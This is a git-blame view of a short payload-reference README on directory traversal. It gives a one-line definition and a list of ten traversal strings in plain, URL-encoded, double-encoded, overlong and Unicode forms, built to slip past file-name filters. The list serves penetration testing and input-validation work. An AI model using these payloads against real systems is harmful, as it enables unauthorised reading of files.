PayloadsAllTheThings/Traversal_Directory/README.md

20 lines
398 B
Markdown
Raw Normal View History

2016-10-19 00:51:24 +00:00
# Traversal Directory
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
2016-10-18 08:01:56 +00:00
2016-10-19 00:51:24 +00:00
## Exploit
2016-10-18 08:01:56 +00:00
```
2016-10-19 00:51:24 +00:00
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
2016-10-18 08:01:56 +00:00
```
## Thanks to
2016-10-19 00:51:24 +00:00
*